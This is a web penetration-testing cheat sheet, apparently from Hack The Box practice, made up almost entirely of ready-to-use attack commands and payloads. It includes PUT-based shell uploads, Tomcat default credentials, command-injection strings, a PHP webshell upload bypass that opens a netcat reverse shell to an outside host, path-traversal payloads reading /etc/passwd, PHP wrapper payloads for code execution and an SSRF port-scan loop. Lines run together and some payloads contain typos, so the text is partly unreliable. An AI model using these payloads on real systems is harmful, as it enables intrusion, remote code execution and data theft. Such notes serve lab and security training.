Checking HTTP Methods
curl -i -X OPTIONS http://XXXXnmap --script http-methods --script-args http-methods.url-path='/test' $ipCurl usagecurl -X POST http://internal-01.bart.htb/simple_chat/register.php -d "uname=0xdf&passwd=password"
Shell via Put Method
Put Shellcurl -X PUT -T "/path/to/file" "http://myputserver.com/puturl.tmp"curl -X MOVE --header "Destination:http://ip/asp.asp" "http://ip/asp.txt"
RFI
$ fimap -u "http://$ip/example.php?test="$ https://github.com/lightos/Panoptic/
JBOSS
JMX Console http://$ip:8080/jmxconcole/ā
Tomcat Manager Default Credentials
Tomcat manager, try default credentials: tomcat/tomcat, admin/manager, admin/password, admin/s3cret, admin (emtpy password).ā
Command Injection
Command injection`id`| id&& iderror || id%0a id
File upload bypass
content-type:image/gifGIF89a <?php echo system{$_REQUEST['ippsec']); ?>?ippsec=nc -e /bin/sh ip port
SQL Shell
msql -u root -p\! /bin/sh
LFI
Linux../../../../../../../../../../etc/passwd..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd../../../../../../../../../../etc/passwd%00..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%2500āWindows../../../../../../../../../../boot.ini..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini../../../../../../../../../../boot.ini%00..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fboot.ini%2500Wordlists/usr/share/wordlists/SecLists/Fuzzing/JHADDIX_LFI.txt
LFI Wrappers
LFI Wrappersexpect://http://x.x.x.x/blah?parameter=expect://whoamidata://http://x.x.x.x/blah?parameter=data://text/plain;base64,PD8gcGhwaW5mbygpOyA/Pg==# the base64 encoded payload is: <? phpinfo(); ?>input://http://x.x.x.x/blah?parameter=php://input# POST data (using Hackbar)<? phpinfo(); ?>
LFI to RCE
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/File%20inclusion#wrapper-dataā
SSRF
for i in $(seq 1 60000); do echo $i; curl -X GET http://ip:60000/url.php?path=http://localhost:$i/ 2> /dev/null | tr -d ā\nā; doneā